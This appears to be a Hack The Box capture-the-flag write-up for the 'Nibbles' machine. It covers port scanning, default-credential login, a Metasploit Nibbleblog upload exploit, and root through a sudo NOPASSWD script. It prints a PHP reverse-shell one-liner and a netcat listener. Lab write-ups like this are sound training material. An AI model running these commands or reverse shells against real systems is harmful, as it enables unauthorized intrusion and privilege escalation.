Nibbles – Hackthebox

Skills Required
Basic knowledge of Linux
Enumerating ports and services

Skills Learned
Very Basic scripting
Web enumeration
Exploiting NOPASSWD


Nmap scan revealed 2 open ports 22 and 80

[root:~]# nmap -p- -f
Starting Nmap 7.70 ( ) at 2018-04-16 12:10 BST
Nmap scan report for
Host is up, received echo-reply ttl 63 (0.032s latency).
Not shown: 65311 closed ports, 222 filtered ports
Reason: 65311 resets and 222 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63

Browsing to the webpage gave me this and viewing the source directed me to a blog type website.

I ran a dirbuster on and found an admin area. I googled the default creds for nibblesblog and tried them. It worked


I looked to see if there were any exploits for nibble and seen there was a Metasploit module.

[root:~/Desktop/nibbles]# searchsploit nibble
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title | Path
 | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Nibbleblog - Arbitrary File Upload (Metasploit) | exploits/php/remote/38489.rb
Nibbleblog - Multiple SQL Injections | exploits/php/webapps/35865.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
[root:~/Desktop/nibbles]# cat /usr/share/exploitdb/exploits/php/webapps/35865.txt

Nibbleblog is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Nibbleblog 3.0 is affected; other versions may also be vulnerable.[SQLi][SQLi]# [root:~/Desktop/nibbles]#

I cranked up Metasploit and ran the exploit with the following details and got a Metreperter shell:

I navigated to the home directory and into nibbler’s home directory to get the user.

meterpreter > cat user.txt

Its always good to see what su access you have. What i’ve found in HTB is that it generally gives away what you have to modify and run to get root. Sure enough:

meterpreter > shell
Process 22018 created.
Channel 1 created.
sudo -l
sudoMatching Defaults entries for nibbler on Nibbles:
 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
 (root) NOPASSWD: /home/nibbler/personal/stuff/
: unable to resolve host Nibbles: Connection timed out

So I can run as root which will allow me to get a reverse root shell. I unzipped the personal zip folder and added this to the bottom of

sudo php -r '$sock=fsockopen("",44444);exec("/bin/sh -i <&3 >&3 2>&3");'

I started a netcat listener on the 44444 port. After about 20 seconds I got a connection back.

[root:...ktop/nibbles/personal/stuff]# nc -lvp 44444
listening on [any] 44444 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 50308
/bin/sh: 0: can't access tty; job control turned off
# whoami
# cat /root/root.txt



This was quite and easy box for me. Not long ago I had finished Bashed and remembered to take advantage of the sudo -l. I want to go back and redo this box before it retires and complete it without using metasploit.